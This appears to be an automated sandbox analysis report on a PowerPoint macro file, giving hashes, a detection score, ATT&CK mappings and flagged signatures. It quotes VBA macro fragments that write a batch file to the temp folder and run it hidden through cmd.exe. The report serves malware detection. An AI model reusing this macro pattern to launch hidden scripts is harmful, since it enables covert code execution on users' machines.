Loading ...

Play interactive tourEdit tour

Analysis Report test.ppsm

Overview

General Information

Sample Name:test.ppsm
Analysis ID:428845
MD5:99a4963b54d93b286ff5de714c7f5010
SHA1:66fb2a56df63e96af7b43b843a918370a8763147
SHA256:61af0a3d3d4d9b0a52b94b96830adc7bbe000f626c02c8914b001c155e90d9da
Infos:

Most interesting Screenshot:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings

Classification

Process Tree

  • System is w7x64
  • POWERPNT.EXE (PID: 1948 cmdline: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /AUTOMATION -Embedding MD5: EBBBEF2CCA67822395E24D6E18A3BDF6)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\550AD343.pngJump to behavior

System Summary:

barindex
Document contains an embedded VBA macro which may execute processesShow sources
Source: test.ppsmOLE, VBA macro line: wsh.Run "cmd.exe /c %temp%\art1204.bat", vbMinimizedNoFocus
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: test.ppsmOLE, VBA macro line: Dim wsh As Object: Set wsh = VBA.CreateObject("WScript.Shell")
Source: test.ppsmOLE, VBA macro line: Open Environ("temp") & "\art1204.bat" For Output As #1
Source: test.ppsmOLE, VBA macro line: wsh.Run "cmd.exe /c %temp%\art1204.bat", vbMinimizedNoFocus
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function Malicious_File, String wscript: Set wsh = VBA.CreateObject("WScript.Shell")Name: Malicious_File
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function Malicious_File, String environ: Open Environ("temp") & "\art1204.bat" For Output As # 1Name: Malicious_File
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function Malicious_File, String cmd.exe: wsh.Run "cmd.exe /c %temp%\art1204.bat", vbMinimizedNoFocusName: Malicious_File
Source: classification engineClassification label: mal48.expl.winPPSM@1/11@0/0
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile created: C:\Users\user\Desktop\~$test.ppsmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC7E0.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Resiliency\StartupItemsJump to behavior
Source: test.ppsmStatic file information: File size 4802837 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting2Path InterceptionPath InterceptionMasquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsScripting2LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.